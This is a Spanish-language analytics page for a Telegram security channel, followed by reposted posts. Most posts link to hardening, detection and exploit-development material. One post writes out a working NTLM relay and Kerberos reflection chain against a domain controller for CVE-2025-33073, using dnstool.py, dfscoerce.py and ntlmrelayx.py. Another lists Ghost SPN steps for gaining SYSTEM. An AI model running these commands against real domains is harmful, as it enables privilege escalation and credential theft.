¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
All Security Engineering Courses
Ir al canal en Telegram
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Mostrar más📈 Análisis del canal de Telegram All Security Engineering Courses
El canal All Security Engineering Courses (@allsecurityengineeringcourses) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 18 786 suscriptores, ocupando la posición 7 170 en la categoría Tecnologías y Aplicaciones y el puesto 35 989 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 18 786 suscriptores.
Según los últimos datos del 11 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 133, y en las últimas 24 horas de 11, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 9.50%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 3.09% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 784 visualizaciones. En el primer día suele acumular 580 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 2.
- Intereses temáticos: El contenido se centra en temas clave como git, strace, github, linux, docker.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 12 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
18 786
Suscriptores
+1124 horas
+247 días
+13330 días
Archivo de publicaciones
Hello everyone!
We have more news about NTLM Relay! We've told the world so many times... Never mind :)
So, let's start with the sources:
1. In Win11, the Printerbug-vulnerable service now runs over TCP rather than named pipes (ncacn_np), so a POC has been created that connects to the service over ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. A service vulnerable to PetitPotam may not work by default, but we can try to enable it, for example, using the efsr_spray.py module (https://github.com/Pennyw0rth/NetExec/pull/718).
A similar trick, but this time interacting with the required named pipe to enable Remote Registry, can be used like this: echo start > \\.\pipe\winreg . All of these enablement methods are combined under a single, larger mechanism called Service Triggers, a detailed analysis of which was published by our colleagues at TrustedSec (https://trustedsec.com/blog/theres-more-than-one-way-to-trigger-a-windows-service).
Then came some wonderful news: rainbow tables for NetNTLMv1 were released (https://console.cloud.google.com/storage/browser/net-ntlmv1-tables;tab=objects?pli=1&prefix=&forceOnObjectsSortingFiltering=false). Even if it's in 2025 :)
But the most curious trick I saw today on Twitter was this one. A bug called the Kerberos Reflection Attack was released this year. In short, the system receives a TGS ticket for one device, passes it on to the attacker, and they, in turn, use it without any problems. We can exploit this CVE-2025-33073 with NTLM, for example, to bypass a signature! It's done like this:
# We attack a computer named DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
![#Exclusive 🔥 #First_Time_Ever 🔥 CyberWarFare Labs - Certified Exploit Development Professional [CEDP] 2025.6 🔥🆕 👨💻 Pas](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAoACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDVnYrESDg1VQySH5WP1zVi5/1Dfh/OmwYEC4xyeaxkrzNIu0bh5b4/1x/pUMhmjOGY/XNT+a3m7ccZpLjBgbOOOlKUU1oOLaeo+AlolJ60Ulr/AMe6/j/OitI/CiHuxLvi2f8AD+dQ2k67PLY4Papr0E2rgdeP51miNsHcGH4U3F3uiotctma2D61Vu512+Wpye9VdrY273x6YprRsOgJ/ChxbVhxsndmlaf8AHsn4/wA6KLPItUB68/zoppWVjN6tsS9VntXVBk8cD61k+RP/AM8ZP++TRRWkJ2WxDHeXcYx9nP8A3xTfIn/54v8A98miir9r5Aa1kjJaorjDc8H60UUVi9WUf//Z)
Repost from 1N73LL1G3NC3
UnderlayCopy
PowerShell toolkit that extracts locked Windows files (SAM, SYSTEM, NTDS, ...) using MFT parsing and raw disk reads.
Repost from 1N73LL1G3NC3
Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation
In an attack exploiting CVE‑2025‑58726, a bad actor would perform the following steps:
• Identify a Ghost SPN on the target machine.
• Register a DNS record for the Ghost SPN pointing to the attacker machine.
• Use a Kerberos relay tool (e.g., my KrbRelayEx script, available on GitHub) to intercept the Kerberos authentication.
• Trigger authentication for the target machine (e.g., using Printer Bug, PetitPotam, or similar).
• Relay the Kerberos ticket back to the target machine.
• Gain SYSTEM access via SMB and execute arbitrary commands.
P.S.
This attack targets Kerberos by abusing misconfigured SPNs; it does not affect NTLM. The fix for CVE-2025-33073 (Windows SMB Client Elevation of Privilege Vulnerability) addressed a specific SMB client issue. However, the Ghost SPN attack method bypasses that fix. The vulnerability lies in Kerberos itself, which fails to prevent authentication reflection. The same approach can be applied to other protocols that rely on Kerberos.
Repost from N/a
#hardening
#Whitepaper
#Hardware_Security
"Windows 11 Security Book:
Security by design. Security by default", Nov. 2024.
See also:
]-> Windows 11 Secured-core PCs
]-> Win10/11/2016/2019/2022 Trusted Platform Module (TPM) Settings
]-> System Guard Secure Launch and SMM protection (Win10/11)
]-> Configure BitLocker (Win10/11/2016/2019/2022/2025)
]-> Enable virtualization-based protection of code integrity
]-> Memory integrity and VBS controls
]-> Configure Hyper-V firewall (Win11 22H2)
]-> Configure Group Policy settings for MS Defender Application Guard
]-> Configure Win10/11 Sandbox
]-> Deploy App Control by using Group Policy (Win10/11/2016/2019/2022/2025)
]-> Windows 10/11 Hardening Script
Repost from N/a
#DFIR
#tools
#Blue_Team_Techniques
"Detecting Pass-the-Hash Attack in a Microsoft Active Directory Environment using an Open-Source Approach", 2024.
]-> Pass the hash in Windows 10
]-> Pass-the-hash attacks: Tools and Mitigation (.pdf)
]-> Tool to detect suspicious privileged NTLM connections (PtH attack) based on event viewer logs
Repost from Blue Team
𝗘𝗫𝗣𝗟𝗢𝗜𝗧 𝗗𝗘𝗩𝗘𝗟𝗢𝗣𝗠𝗘𝗡𝗧 🐌
🔗 Part 1 : Intro :-
https://0xninjacyclone.github.io/posts/exploitdev_1_intro/
🔗 Part 2 : Understanding Stack Memory :-
https://0xninjacyclone.github.io/posts/exploitdev_2_stack/
🔗 Part 3 : Understanding Heap Memory :-
https://0xninjacyclone.github.io/posts/exploitdev_3_heap/
🔗 Part 4 : Understanding Binary Files :-
https://0xninjacyclone.github.io/posts/exploitdev_4_binfiles/
🔗 Part 5 : Dealing with Windows PE files programmatically :-
https://0xninjacyclone.github.io/posts/exploitdev_5_winpe/
🔗 Part 6 : Dealing with ELF files programmatically :-
https://0xninjacyclone.github.io/posts/exploitdev_6_elf/
🔗 Part 7 : How to do magic with string format bugs :-
https://0xninjacyclone.github.io/posts/exploitdev_7_strfmt/
🔗 Part 8 : Buffer Over-Read Attacks and Developing a Real Exploit :-
https://0xninjacyclone.github.io/posts/exploitdev_8_bor/
@BlueTeamKit #exploit_development #binary_exploitation #vulnerability_research #buffer_overread
Repost from CyberSecurityTechnologies
#tools
#Space_Security
"Don’t Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites", Oct. 2025.
]-> IP encapsulation parser from raw DVB-S2(X) captures
// A shockingly large amount of sensitive traffic is being broadcast unencrypted, including critical infrastructure, internal corporate and government communications, private citizens’ voice calls and SMS, and consumer Internet traffic from in-flight wifi and mobile networks. This data can be passively observed by anyone with a few hundred dollars of consumer-grade hardware..
Repost from CyberSecurityTechnologies
#AppSec
#Offensive_security
"Finding Critical Bugs in Adobe Experience Manager", BSides 2025.
]-> Security research
]-> AEM hacking toolkit
// In this blog post, we provide an in-depth look at how AEM operates under the hood, including modern dispatcher bypasses that target real systems (CVE-2025-54251, CVE-2025-54249, CVE-2025-54252, CVE-2025-54250, CVE-2025-54247, CVE-2025-54248, CVE-2025-54246)
Repost from N/a
☠️ Kubernetes for Pentesters ☠️
A selection of articles on practical Kubernetes penetration testing:
👉 Kubernetes for Pentesters: Part 1
👉 A Pentester’s Approach to Kubernetes Security — Part 1
👉 A Pentester’s Approach to Kubernetes Security — Part 2
#red_team #kubernetes
